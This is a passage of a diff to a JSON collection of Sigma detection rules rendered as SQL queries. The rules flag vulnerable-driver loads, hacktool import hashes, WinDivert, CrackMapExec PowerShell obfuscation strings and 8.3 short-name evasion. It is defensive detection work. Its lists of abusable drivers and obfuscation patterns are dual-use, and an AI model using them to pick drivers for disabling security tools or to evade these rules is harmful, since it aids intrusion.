'%\\\\AsUpIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv102.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv103.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMEMx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMIXP64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMIx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_Flash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_HWMIO64\\_W10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_HWMIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_I2c64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\GVCIDrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HwOs2Ec10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HwOs2Ec7x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NBIOLib\\_X64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NCHGBIOS2x64.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NTIOLib\\_X64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PhlashNT.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Phymemx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\UCOREW64.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinFlash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtcBSv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflash.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflsh64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phymem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow8x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\segwindrvx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\superbmc.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\semav6msr.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\piddrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_I2cIo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AMDRyzenMasterDriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LHA.sys' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\kEvP64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMI.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TmComm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iQVW64.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iQVW32.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vmdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HpPortIox64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AMDPowerProfiler.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CorsairLLAccess64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\RTCore64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libnicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\procexp.Sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv106.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zamguard64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zam64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fidpcidrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\MsIo32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\IOMap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ATSZIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswVmm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FairplayKD.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pgldqpoc.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iqvw64e.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Monitor\\_win10\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvnetbus.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Mslo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcdsrvc\\_x64.pkms' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\krpocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HWiNFO64A.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rzpnk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magdrvamd64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86-withoutdbg.sys' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\driver7-x86.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gmer.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PCADRVX64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clfs.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ActiveHealth.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CAM\\_V3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\GameFire.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenHardwareMonitor.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenHardwareMonitorLib.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenHardwareMonitorReport.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SmartDashboard.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemGauge.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemGaugeX7.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VideoNovaServerControllerService.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ellp\\_service.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hardwareproviders.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ohm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sensorsview32\\_64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\touchpointanalyticsclient.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CQg5Jf.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HCdRDh.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NcDgDn.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vLTZ19.sys' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 
'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', 
'89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE 
'\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_drivers_names.yml" + "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" }, { - "title": "WinDivert Driver Load", - "id": "679085d5-f427-4484-9f58-1dc30a7c426d", - "status": "experimental", - "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - CrackMapExec PowerShell Obfuscation", + "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", + "status": "test", + "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", + "author": "Thomas Patzke", "tags": [ - "attack.collection", + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1599.001", - "attack.t1557.001" + "attack.t1027.005" ], "falsepositives": [ - "Legitimate WinDivert driver usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE 
'%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', 
'0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" ], - "filename": "driver_load_win_windivert.yml" + "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" }, { - "title": "Vulnerable AVAST Anti Rootkit Driver Load", - "id": "7c676970-af4f-43c8-80af-ec9b49952852", + "title": "Use NTFS Short Name in Command Line", + "id": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", "status": "experimental", - "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Unknown" + "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%~1.exe%' ESCAPE '\\' OR CommandLine LIKE '%~1.bat%' ESCAPE '\\' OR CommandLine LIKE '%~1.msi%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~1.dll%' ESCAPE '\\' OR CommandLine LIKE '%~1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~1.js%' ESCAPE '\\' OR CommandLine LIKE '%~1.hta%' ESCAPE '\\' OR CommandLine LIKE '%~2.exe%' ESCAPE '\\' OR CommandLine LIKE '%~2.bat%' ESCAPE '\\' OR CommandLine LIKE '%~2.msi%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~2.dll%' ESCAPE '\\' OR CommandLine LIKE '%~2.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~2.js%' ESCAPE '\\' OR CommandLine LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\xampp\\\\vcredist\\\\VCREDI~1.EXE%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_use_cli.yml" }, { - "title": "Vulnerable Dell BIOS Update Driver Load", - "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", - "status": "experimental", - "description": "Detects the load of the 
